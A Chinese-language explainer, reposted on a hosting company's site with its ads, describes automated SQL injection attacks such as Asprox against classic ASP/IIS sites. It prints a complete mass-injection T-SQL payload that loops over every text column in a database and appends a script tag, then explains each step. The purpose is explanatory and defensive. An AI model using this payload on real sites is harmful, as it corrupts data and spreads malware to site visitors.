|
自動攻擊
攻擊者可以使用兩種主要的攻擊方法來利用SQL注入漏洞:自動攻擊和手動攻擊。從字面上看似乎很容易理解�,但這兩種攻擊在機制上是非常不同的。自動攻擊一般是為特定目的而編制的一種工具所導致的結(jié)果�����。例如��,有的攻擊使用大規(guī)模的注入攻擊����,其目的是為了讓其攻擊范圍最大化并任意擴散其代碼��。這種大規(guī)模的攻擊一般針對非常具體的應(yīng)用程序架構(gòu)�,如運行ASP的IIS億恩科技服務(wù)器等���。而Asprox攻擊��,其目的是為了將一個JavaScript或iframe標記注入到網(wǎng)頁中����,從而傳播病毒����。
自動SQL注入舉例
下面是一個高級SQL注入攻擊的例子�����,它能夠注入到某些字段類型中�����。很長一段時間以來���,此類代碼可以有效的幫助攻擊者傳播病毒���。
wangzhan.com/ssp.asp?username=zhangsan’;DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE TABLE_CURSOR CURSOR FOR SELECT A.NAME,B.NAME FROM SYSOBJECTS A,SYSCOLUMNS B WHERE A.ID=B.ID AND A.XTYPE=‘U’ AND (B.XTYPE=99 OR
B.XTYPE=35 OR B.XTYPE=231 OR B.XTYPE=167) OPEN TABLE_CURSOR FETCH NEXT
FROM TABLE_CURSOR INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN
EXEC(‘UPDATE [‘+@T+’] SET
[‘+@C+’]=RTRIM(CONVERT(VARCHAR(4000),[‘+@C+’]))+’<script code>‘) FETCH NEXT FROM TABLE_CURSOR INTO @T,@C END CLOSE TABLE_CURSOR DEALLOCATE TABLE_CURSOR;--
下面����,我們簡單地看一下這段代碼是如何針對后端數(shù)據(jù)庫實施攻擊的���。首先���,攻擊者聲明了Table (T) 和 Column (C)這兩個變量。
DECLARE @T VARCHAR(255),@C VARCHAR(255)
并聲明了一個可以保存查詢結(jié)果的表cursor:
DECLARE TABLE_CURSOR CURSOR FOR
下面的SELECT語句通過“text”����、“sysname”、“varchar”等列來檢索所有的用戶對象����,并且將結(jié)果存儲在前面創(chuàng)建的CURSOR中。
SELECT A.NAME,B.NAME FROM SYSOBJECTS A,SYSCOLUMNS B WHERE A.ID=B.ID AND A.XTYPE=‘U’ AND (B.XTYPE=99 OR B.XTYPE=35 OR B.XTYPE=231 OR B.XTYPE=167)
在下面的代碼中��,數(shù)據(jù)表CURSOR檢索結(jié)果�,并將其分配給表和列變量:
OPEN TABLE_CURSOR FETCH NEXT FROM TABLE_CURSOR INTO @T,@C WHILE(@@FETCH_STATUS=0)
此時,攻擊者已經(jīng)檢索了數(shù)據(jù)庫中基于文本的這些列�,其意圖是為了修改這些列的內(nèi)容。在這里,攻擊者雖然沒有篡改數(shù)據(jù)��,但已經(jīng)完成了所有必要的偵察��。然后���,執(zhí)行更新語句��,將JavaScript置于列變量中的每一列中���。攻擊完成后,包含Web內(nèi)容(這些內(nèi)容源自數(shù)據(jù)庫的任何字段)的任何網(wǎng)頁都會提交攻擊者的惡意JavaScript代碼����。然后,該JavaScript用一個病毒感染W(wǎng)eb用戶的計算機:
WHILE(@@FETCH_STATUS=0) BEGIN EXEC(‘UPDATE [‘+@T+’] SET [‘+@C+’]=RTRIM(CONVERT(VARCHAR(4000),[‘+@C+’]))+’<script code>‘) FETCH NEXT FROM TABLE_CURSOR INTO @T,@C END
在注入的結(jié)尾�����,攻擊者執(zhí)行清理�����,覆蓋所有的攻擊痕跡:
CLOSE TABLE_CURSOR DEALLOCATE TABLE_CURSOR;--
這些攻擊是完全自動化的�����;黑客攻擊只需使用搜索引擎簡單地搜索互聯(lián)網(wǎng)���,查找運行經(jīng)典的ASP代碼的Web億恩科技服務(wù)器即可���。別再自欺欺人的相信“我的網(wǎng)站:(mszdt.com)很小,誰會愿意攻擊它呢�����?”這種愚蠢的謊言���。如果你正在通過互聯(lián)網(wǎng)做商務(wù)��,不管企業(yè)大小�����,都易于遭到攻擊���。
本文出自:億恩科技【mszdt.com】
服務(wù)器租用/服務(wù)器托管中國五強��!虛擬主機域名注冊頂級提供商!15年品質(zhì)保障���!--億恩科技[ENKJ.COM]
|
香港服務(wù)器租用
美國服務(wù)器租用
電信骨干機房
聯(lián)通骨干機房
0371-60135900
